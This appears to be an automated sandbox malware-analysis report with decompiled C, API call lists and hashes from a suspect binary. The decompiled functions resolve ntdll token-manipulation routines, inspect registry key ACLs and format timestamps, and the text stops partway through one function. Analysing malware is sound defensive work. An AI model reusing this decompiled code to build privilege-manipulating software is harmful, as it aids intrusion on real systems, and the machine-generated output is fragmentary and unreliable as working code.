                                                                                                                                  • API ID: ServiceStatus
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3969395364-0
                                                                                                                                  • Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                                                                  • Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
                                                                                                                                  • Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
                                                                                                                                  • Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (executed / not-executed blocks): control_flow_graph 571 416f00-416f07 call 416e30 573 416f0c-416f10 571->573
                                                                                                                                  APIs
                                                                                                                                  • __encode_pointer.LIBCMTD ref: 00416F07
                                                                                                                                    • Part of subcall function 00416E30: __crt_wait_module_handle.LIBCMTD ref: 00416E7C
                                                                                                                                    • Part of subcall function 00416E30: RtlEncodePointer.NTDLL(?), ref: 00416EB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer__crt_wait_module_handle__encode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2010845264-0
                                                                                                                                  • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction ID: f8527b63a1fa4e1e3ea2e981291df3c9c0dfee618300b93caa5b292de4cdc523
                                                                                                                                  • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction Fuzzy Hash: 4BA0127644430833D00020877803B02390D43C0638F090021F50C051426842E4508097
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (executed / not-executed blocks): control_flow_graph 574 4098f2-4098f4 575 4098f6-409902 call 404280 574->575 578 409904-409913 Sleep 575->578 579 409917 575->579 578->575 580 409915 578->580 581 409919-409942 call 402544 call 40977c 579->581 582 40995e-409960 579->582 580->579 586 409947-409957 call 40ee2a 581->586 586->582
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E004098F2(void* __ecx) {
                                                                                                                                  				void* _t1;
                                                                                                                                  				void* _t4;
                                                                                                                                  				void* _t5;
                                                                                                                                  				void* _t6;
                                                                                                                                  				void* _t7;
                                                                                                                                  				void* _t15;
                                                                                                                                  
                                                                                                                                  				_t5 = __ecx;
                                                                                                                                  				_t6 = 0;
                                                                                                                                  				while(1) {
                                                                                                                                  					_t1 = E00404280(_t5, 1); // executed
                                                                                                                                  					_t7 = _t1;
                                                                                                                                  					_pop(_t5);
                                                                                                                                  					if(_t7 != 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0x3e8);
                                                                                                                                  					_t6 = _t6 + 1;
                                                                                                                                  					if(_t6 < 0xa) {
                                                                                                                                  						continue;
                                                                                                                                  					} else {
                                                                                                                                  						_t15 = _t7;
                                                                                                                                  					}
                                                                                                                                  					break;
                                                                                                                                  				}
                                                                                                                                  				if(_t15 < 0) {
                                                                                                                                  					_push(0);
                                                                                                                                  					 *0x41201f = 1;
                                                                                                                                  					E0040977C(_t5, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8)); // executed
                                                                                                                                  					_t4 = E0040EE2A(_t5, 0x4122f8, 0, 0x100);
                                                                                                                                  					 *0x41201f = 0;
                                                                                                                                  					return _t4;
                                                                                                                                  				}
                                                                                                                                  				return _t1;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
                                                                                                                                  • Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3100162736-0
                                                                                                                                  • Opcode ID: a7cf92b023169663f82040c46e27206298971899dd868cb4962a63f067b961dd
                                                                                                                                  • Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
                                                                                                                                  • Opcode Fuzzy Hash: a7cf92b023169663f82040c46e27206298971899dd868cb4962a63f067b961dd
                                                                                                                                  • Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401000() {
                                                                                                                                  				struct HINSTANCE__* _t2;
                                                                                                                                  				_Unknown_base(*)()* _t3;
                                                                                                                                  				signed int _t4;
                                                                                                                                  				struct HINSTANCE__* _t5;
                                                                                                                                  				_Unknown_base(*)()* _t6;
                                                                                                                                  				_Unknown_base(*)()* _t7;
                                                                                                                                  				_Unknown_base(*)()* _t8;
                                                                                                                                  				struct HINSTANCE__* _t9;
                                                                                                                                  				_Unknown_base(*)()* _t10;
                                                                                                                                  				_Unknown_base(*)()* _t11;
                                                                                                                                  				_Unknown_base(*)()* _t12;
                                                                                                                                  				struct HINSTANCE__* _t13;
                                                                                                                                  				_Unknown_base(*)()* _t14;
                                                                                                                                  				_Unknown_base(*)()* _t15;
                                                                                                                                  				_Unknown_base(*)()* _t16;
                                                                                                                                  				struct HINSTANCE__* _t17;
                                                                                                                                  				_Unknown_base(*)()* _t18;
                                                                                                                                  				_Unknown_base(*)()* _t19;
                                                                                                                                  				_Unknown_base(*)()* _t20;
                                                                                                                                  				struct HINSTANCE__* _t21;
                                                                                                                                  				_Unknown_base(*)()* _t22;
                                                                                                                                  				_Unknown_base(*)()* _t23;
                                                                                                                                  				struct HINSTANCE__* _t25;
                                                                                                                                  				struct HINSTANCE__* _t26;
                                                                                                                                  				struct HINSTANCE__* _t27;
                                                                                                                                  				struct HINSTANCE__* _t28;
                                                                                                                                  				struct HINSTANCE__* _t29;
                                                                                                                                  				struct HINSTANCE__* _t30;
                                                                                                                                  				struct HINSTANCE__* _t31;
                                                                                                                                  				struct HINSTANCE__* _t32;
	struct HINSTANCE__* _t33;
	signed int _t34;
	signed int _t35;

	_t2 =  *0x413918; // 0x0
	_t35 = _t34 | 0xffffffff;
	if(_t2 != 0) {
		L3:
		if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
			_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
			 *0x41391c = _t3;
			if(_t3 == 0) {
				L34:
				_t4 = _t35;
			} else {
				_t5 =  *0x413918; // 0x0
				_t35 = 0xfffffffe;
				_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
				 *0x413920 = _t6;
				if(_t6 == 0) {
					goto L34;
				} else {
					_t25 =  *0x413918; // 0x0
					_t35 = 0xfffffffd;
					_t7 = GetProcAddress(_t25, "NtTerminateProcess");
					 *0x413924 = _t7;
					if(_t7 == 0) {
						goto L34;
					} else {
						_t30 =  *0x413918; // 0x0
						_t35 = 0xfffffffc;
						_t8 = GetProcAddress(_t30, "RtlFreeSid");
						 *0x413928 = _t8;
						if(_t8 == 0) {
							goto L34;
						} else {
							_t9 =  *0x413918; // 0x0
							_t35 = 0xfffffffb;
							_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
							 *0x41392c = _t10;
							if(_t10 == 0) {
								goto L34;
							} else {
								_t26 =  *0x413918; // 0x0
								_t35 = 0xfffffffa;
								_t11 = GetProcAddress(_t26, "NtSetInformationThread");
								 *0x413930 = _t11;
								if(_t11 == 0) {
									goto L34;
								} else {
									_t31 =  *0x413918; // 0x0
									_t35 = 0xfffffff9;
									_t12 = GetProcAddress(_t31, "NtSetInformationToken");
									 *0x413934 = _t12;
									if(_t12 == 0) {
										goto L34;
									} else {
										_t13 =  *0x413918; // 0x0
										_t35 = 0xfffffff8;
										_t14 = GetProcAddress(_t13, "RtlNtStatusToDosError");
										 *0x413938 = _t14;
										if(_t14 == 0) {
											goto L34;
										} else {
											_t27 =  *0x413918; // 0x0
											_t35 = 0xfffffff7;
											_t15 = GetProcAddress(_t27, "NtClose");
											 *0x41393c = _t15;
											if(_t15 == 0) {
												goto L34;
											} else {
												_t32 =  *0x413918; // 0x0
												_t35 = 0xfffffff6;
												_t16 = GetProcAddress(_t32, "NtOpenProcessToken");
												 *0x413940 = _t16;
												if(_t16 == 0) {
													goto L34;
												} else {
													_t17 =  *0x413918; // 0x0
													_t35 = 0xfffffff5;
													_t18 = GetProcAddress(_t17, "NtDuplicateToken");
													 *0x413944 = _t18;
													if(_t18 == 0) {
														goto L34;
													} else {
														_t28 =  *0x413918; // 0x0
														_t35 = 0xfffffff4;
														_t19 = GetProcAddress(_t28, "RtlAllocateAndInitializeSid");
														 *0x413948 = _t19;
														if(_t19 == 0) {
															goto L34;
														} else {
															_t33 =  *0x413918; // 0x0
															_t35 = 0xfffffff3;
															_t20 = GetProcAddress(_t33, "NtFilterToken");
															 *0x41394c = _t20;
															if(_t20 == 0) {
																goto L34;
															} else {
																_t21 =  *0x413918; // 0x0
																_t35 = 0xfffffff2;
																_t22 = GetProcAddress(_t21, "RtlLengthSid");
																 *0x413950 = _t22;
																if(_t22 == 0) {
																	goto L34;
																} else {
																	_t29 =  *0x413918; // 0x0
																	_t35 = 0xfffffff1;
																	_t23 = GetProcAddress(_t29, "NtQueryInformationToken");
																	 *0x413954 = _t23;
																	_t1 = _t35 + 0x10; // 0x100000001
																	_t4 = _t1;
																	if(_t23 == 0) {
																		goto L34;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}
			return _t4;
		} else {
			return 1;
		}
	} else {
		_t2 = LoadLibraryA("ntdll.dll");
		 *0x413918 = _t2;
		if(_t2 != 0) {
			goto L3;
		} else {
			return _t2;
		}
	}
}
0x00401000
0x00401006
0x0040100b
0x00401023
0x0040102a
0x004010c2
0x004010c4
0x004010cb
0x0040127b
0x0040127b
0x004010d1
0x004010d1
0x004010dc
0x004010e1
0x004010e3
0x004010ea
0x00000000
0x004010f0
0x004010f0
0x004010fc
0x00401101
0x00401103
0x0040110a
0x00000000
0x00401110
0x00401110
0x0040111c
0x00401121
0x00401123
0x0040112a
0x00000000
0x00401130
0x00401130
0x0040113b
0x00401140
0x00401142
0x00401149
0x00000000
0x0040114f
0x0040114f
0x0040115b
0x00401160
0x00401162
0x00401169
0x00000000
0x0040116f
0x0040116f
0x0040117b
0x00401180
0x00401182
0x00401189
0x00000000
0x0040118f
0x0040118f
0x0040119a
0x0040119f
0x004011a1
0x004011a8
0x00000000
0x004011ae
0x004011ae
0x004011ba
0x004011bf
0x004011c1
0x004011c8
0x00000000
0x004011ce
0x004011ce
0x004011da
0x004011df
0x004011e1
0x004011e8
0x00000000
0x004011ee
0x004011ee
0x004011f9
0x004011fe
0x00401200
0x00401207
0x00000000
0x00401209
0x00401209
0x00401215
0x0040121a
0x0040121c
0x00401223
0x00000000
0x00401225
0x00401225
0x00401231
0x00401236
0x00401238
0x0040123f
                                                                                                                                  0x00000000
                                                                                                                                  0x00401241
                                                                                                                                  0x00401241
                                                                                                                                  0x0040124c
                                                                                                                                  0x00401251
                                                                                                                                  0x00401253
                                                                                                                                  0x0040125a
                                                                                                                                  0x00000000
                                                                                                                                  0x0040125c
                                                                                                                                  0x0040125c
                                                                                                                                  0x00401268
                                                                                                                                  0x0040126d
                                                                                                                                  0x0040126f
                                                                                                                                  0x00401276
                                                                                                                                  0x00401276
                                                                                                                                  0x00401279
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401279
                                                                                                                                  0x0040125a
                                                                                                                                  0x0040123f
                                                                                                                                  0x00401223
                                                                                                                                  0x00401207
                                                                                                                                  0x004011e8
                                                                                                                                  0x004011c8
                                                                                                                                  0x004011a8
                                                                                                                                  0x00401189
                                                                                                                                  0x00401169
                                                                                                                                  0x00401149
                                                                                                                                  0x0040112a
                                                                                                                                  0x0040110a
                                                                                                                                  0x004010ea
                                                                                                                                  0x0040127f
                                                                                                                                  0x004010ae
                                                                                                                                  0x004010b4
                                                                                                                                  0x004010b4
                                                                                                                                  0x0040100d
                                                                                                                                  0x00401012
                                                                                                                                  0x00401018
                                                                                                                                  0x0040101f
                                                                                                                                  0x00000000
                                                                                                                                  0x00401022
                                                                                                                                  0x00401022
                                                                                                                                  0x00401022
                                                                                                                                  0x0040101f

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 004010E1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtTerminateProcess), ref: 00401101
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlFreeSid), ref: 00401121
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00401140
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationThread), ref: 00401160
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationToken), ref: 00401180
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040119F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtClose), ref: 004011BF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenProcessToken), ref: 004011DF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtDuplicateToken), ref: 004011FE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                                                                  • API String ID: 2238633743-3228201535
                                                                                                                                  • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                                                                  • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                                                                  • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                  			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				struct _SYSTEMTIME _v28;
                                                                                                                                  				CHAR* _v32;
                                                                                                                                  				CHAR* _v36;
                                                                                                                                  				CHAR* _v40;
                                                                                                                                  				CHAR* _v44;
                                                                                                                                  				CHAR* _v48;
                                                                                                                                  				CHAR* _v52;
                                                                                                                                  				CHAR* _v56;
                                                                                                                                  				CHAR* _v60;
                                                                                                                                  				CHAR* _v64;
                                                                                                                                  				CHAR* _v68;
                                                                                                                                  				CHAR* _v72;
                                                                                                                                  				CHAR* _v76;
                                                                                                                                  				CHAR* _v80;
                                                                                                                                  				CHAR* _v84;
                                                                                                                                  				CHAR* _v88;
                                                                                                                                  				CHAR* _v92;
                                                                                                                                  				CHAR* _v96;
                                                                                                                                  				CHAR* _v100;
                                                                                                                                  				CHAR* _v104;
                                                                                                                                  				struct _TIME_ZONE_INFORMATION _v276;
                                                                                                                                  				long _t77;
                                                                                                                                  				signed int _t80;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				signed int _t101;
                                                                                                                                  				signed int _t102;
                                                                                                                                  				CHAR* _t103;
                                                                                                                                  				signed int _t104;
                                                                                                                                  				signed short _t106;
                                                                                                                                  				signed short _t109;
                                                                                                                                  				signed int _t114;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				void* _t117;
                                                                                                                                  
                                                                                                                                  				_v56 = "Sun";
                                                                                                                                  				_v52 = "Mon";
                                                                                                                                  				_v48 = "Tue";
                                                                                                                                  				_v44 = "Wed";
                                                                                                                                  				_v40 = "Thu";
                                                                                                                                  				_v36 = "Fri";
                                                                                                                                  				_v32 = "Sat";
                                                                                                                                  				_v104 = "Jan";
                                                                                                                                  				_v100 = "Feb";
                                                                                                                                  				_v96 = "Mar";
                                                                                                                                  				_v92 = "Apr";
                                                                                                                                  				_v88 = "May";
                                                                                                                                  				_v84 = "Jun";
                                                                                                                                  				_v80 = "Jul";
                                                                                                                                  				_v76 = "Aug";
                                                                                                                                  				_v72 = "Sep";
                                                                                                                                  				_v68 = "Oct";
                                                                                                                                  				_v64 = "Nov";
                                                                                                                                  				_v60 = "Dec";
                                                                                                                                  				if(_a4 != 0) {
                                                                                                                                  					FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                  					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                                                                  				} else {
                                                                                                                                  					GetLocalTime( &_v28);
                                                                                                                                  				}
                                                                                                                                  				_t114 = _a12;
                                                                                                                                  				if(_t114 != 0) {
                                                                                                                                  					SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                                  					_t93 = E0040ECA5();
                                                                                                                                  					if(_t114 <= 0) {
                                                                                                                                  						_t104 = _t93 %  ~_t114 * 0x23c34600;
                                                                                                                                  						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
                                                                                                                                  						asm("sbb [ebp-0x4], ebx");
                                                                                                                                  					} else {
                                                                                                                                  						_t104 = _t93 % _t114 * 0x23c34600;
                                                                                                                                  						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
                                                                                                                                  						asm("adc [ebp-0x4], ebx");
                                                                                                                                  					}
                                                                                                                                  					FileTimeToSystemTime( &_v12,  &_v28);
                                                                                                                                  				}
                                                                                                                                  				_v276.Bias = 0;
                                                                                                                                  				_t77 = GetTimeZoneInformation( &_v276);
                                                                                                                                  				_t101 = _v276.Bias;
                                                                                                                                  				if(_t77 == 2) {
                                                                                                                                  					_t101 = _t101 + _v276.DaylightBias;
                                                                                                                                  				}
                                                                                                                                  				_t102 =  ~_t101;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				_t80 = (_t102 ^ _t104) - _t104;
                                                                                                                                  				if(_v28.wDayOfWeek > 6) {
                                                                                                                                  					_t109 = 6;
                                                                                                                                  					_v28.wDayOfWeek = _t109;
                                                                                                                                  				}
                                                                                                                                  				if(_v28.wMonth == 0) {
                                                                                                                                  					_v28.wMonth = 1;
                                                                                                                                  				}
                                                                                                                                  				if(_v28.wMonth > 0xc) {
                                                                                                                                  					_t106 = 0xc;
                                                                                                                                  					_v28.wMonth = _t106;
                                                                                                                                  				}
                                                                                                                                  				_t103 = "+";
                                                                                                                                  				if(_t102 < 0) {
                                                                                                                                  					_t103 = "-";
                                                                                                                                  				}
                                                                                                                                  				_t115 = 0x3c;
                                                                                                                                  				asm("cdq");
                                                                                                                                  				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
                                                                                                                                  			}
                                                                                                                                  0x0040b2d2
                                                                                                                                  0x0040b2d7
                                                                                                                                  0x0040b2e1
                                                                                                                                  0x0040b2e7
                                                                                                                                  0x0040b2f0
                                                                                                                                  0x0040b306
                                                                                                                                  0x0040b30c
                                                                                                                                  0x0040b30f
                                                                                                                                  0x0040b2f2
                                                                                                                                  0x0040b2f4
                                                                                                                                  0x0040b2fa
                                                                                                                                  0x0040b2fd
                                                                                                                                  0x0040b2fd
                                                                                                                                  0x0040b31a
                                                                                                                                  0x0040b31a
                                                                                                                                  0x0040b323
                                                                                                                                  0x0040b329
                                                                                                                                  0x0040b32f
                                                                                                                                  0x0040b338
                                                                                                                                  0x0040b33a
                                                                                                                                  0x0040b33a
                                                                                                                                  0x0040b33d
                                                                                                                                  0x0040b341
                                                                                                                                  0x0040b344
                                                                                                                                  0x0040b34b
                                                                                                                                  0x0040b34f
                                                                                                                                  0x0040b350
                                                                                                                                  0x0040b350
                                                                                                                                  0x0040b358
                                                                                                                                  0x0040b35d
                                                                                                                                  0x0040b35d
                                                                                                                                  0x0040b366
                                                                                                                                  0x0040b36a
                                                                                                                                  0x0040b36b
                                                                                                                                  0x0040b36b
                                                                                                                                  0x0040b371
                                                                                                                                  0x0040b376
                                                                                                                                  0x0040b378
                                                                                                                                  0x0040b378
                                                                                                                                  0x0040b37f
                                                                                                                                  0x0040b380
                                                                                                                                  0x0040b3c4

                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                                                                  • wsprintfA.USER32 ref: 0040B3B7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                                                                  • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                                                                  • API String ID: 766114626-2976066047
                                                                                                                                  • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                                                                  • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E00407A95(void* _a4, char* _a8, signed int _a12) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				int _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				struct _ACL* _v32;
                                                                                                                                  				long _v36;
                                                                                                                                  				long _v40;
                                                                                                                                  				long _v44;
                                                                                                                                  				int _v48;
                                                                                                                                  				int _v52;
                                                                                                                                  				union _SID_NAME_USE _v56;
                                                                                                                                  				int _v60;
                                                                                                                                  				int _v64;
                                                                                                                                  				void _v132;
                                                                                                                                  				char _v388;
                                                                                                                                  				char _v516;
                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v1540;
                                                                                                                                  				void* _t95;
                                                                                                                                  				void* _t104;
                                                                                                                                  				void* _t107;
                                                                                                                                  				void* _t111;
                                                                                                                                  				void* _t116;
                                                                                                                                  				struct _ACL* _t117;
                                                                                                                                  				void* _t118;
                                                                                                                                  				void* _t120;
                                                                                                                                  				void* _t122;
                                                                                                                                  				void* _t123;
                                                                                                                                  				void* _t125;
                                                                                                                                  				char* _t126;
                                                                                                                                  				void* _t130;
                                                                                                                                  				void* _t134;
                                                                                                                                  				void* _t135;
                                                                                                                                  				signed int _t136;
                                                                                                                                  				void* _t143;
                                                                                                                                  				void* _t146;
                                                                                                                                  				int _t148;
                                                                                                                                  				int _t151;
                                                                                                                                  				char* _t158;
                                                                                                                                  				void** _t159;
                                                                                                                                  				void* _t161;
                                                                                                                                  				void* _t164;
                                                                                                                                  				signed int _t172;
                                                                                                                                  				void* _t173;
                                                                                                                                  				char* _t174;
                                                                                                                                  				void* _t175;
                                                                                                                                  				void* _t176;
                                                                                                                                  
                                                                                                                                  				_v32 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_v40 = 0x80;
                                                                                                                                  				_t95 = GetUserNameA( &_v388,  &_v40);
                                                                                                                                  				__eflags = _t95;
                                                                                                                                  				if(_t95 == 0) {
                                                                                                                                  					L48:
                                                                                                                                  					RegCloseKey(_v28);
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					_v36 = 0x44;
                                                                                                                                  					_v44 = 0x80;
                                                                                                                                  					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
                                                                                                                                  					__eflags = _t104;
                                                                                                                                  					if(_t104 == 0) {
                                                                                                                                  						goto L48;
                                                                                                                                  					}
                                                                                                                                  					_v48 = 0x400;
                                                                                                                                  					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
                                                                                                                                  					__eflags = _t107;
                                                                                                                                  					if(_t107 != 0) {
                                                                                                                                  						goto L48;
                                                                                                                                  					}
                                                                                                                                  					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
                                                                                                                                  					__eflags = _t111;
                                                                                                                                  					if(_t111 == 0) {
                                                                                                                                  						L12:
                                                                                                                                  						_v24 = 0;
                                                                                                                                  						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
                                                                                                                                  						__eflags = _t116;
                                                                                                                                  						if(_t116 == 0) {
                                                                                                                                  							L47:
                                                                                                                                  							goto L48;
                                                                                                                                  						}
                                                                                                                                  						_t117 = _v32;
                                                                                                                                  						__eflags = _t117;
                                                                                                                                  						if(_t117 == 0) {
                                                                                                                                  							goto L47;
                                                                                                                                  						}
                                                                                                                                  						_t164 = 0;
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						__eflags = 0 - _t117->AceCount;
                                                                                                                                  						if(0 >= _t117->AceCount) {
                                                                                                                                  							goto L47;
                                                                                                                                  						} else {
                                                                                                                                  							goto L15;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L15:
                                                                                                                                  							_t118 = GetAce(_t117, _v8,  &_v20);
                                                                                                                                  							__eflags = _t118;
                                                                                                                                  							if(_t118 == 0) {
                                                                                                                                  								L31:
                                                                                                                                  								_t73 =  &_v8;
                                                                                                                                  								 *_t73 = _v8 + 1;
                                                                                                                                  								__eflags =  *_t73;
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							_t172 = 0;
                                                                                                                                  							_v16 = _v20 + 8;
                                                                                                                                  							__eflags = _t164;
                                                                                                                                  							if(_t164 <= 0) {
					L21:
					__eflags = _t164 - 0x20;
					if(_t164 < 0x20) {
						 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
						_t164 = _t164 + 1;
						__eflags = _t164;
					}
					_t134 = EqualSid( &_v132, _v16);
					_t159 = _v20;
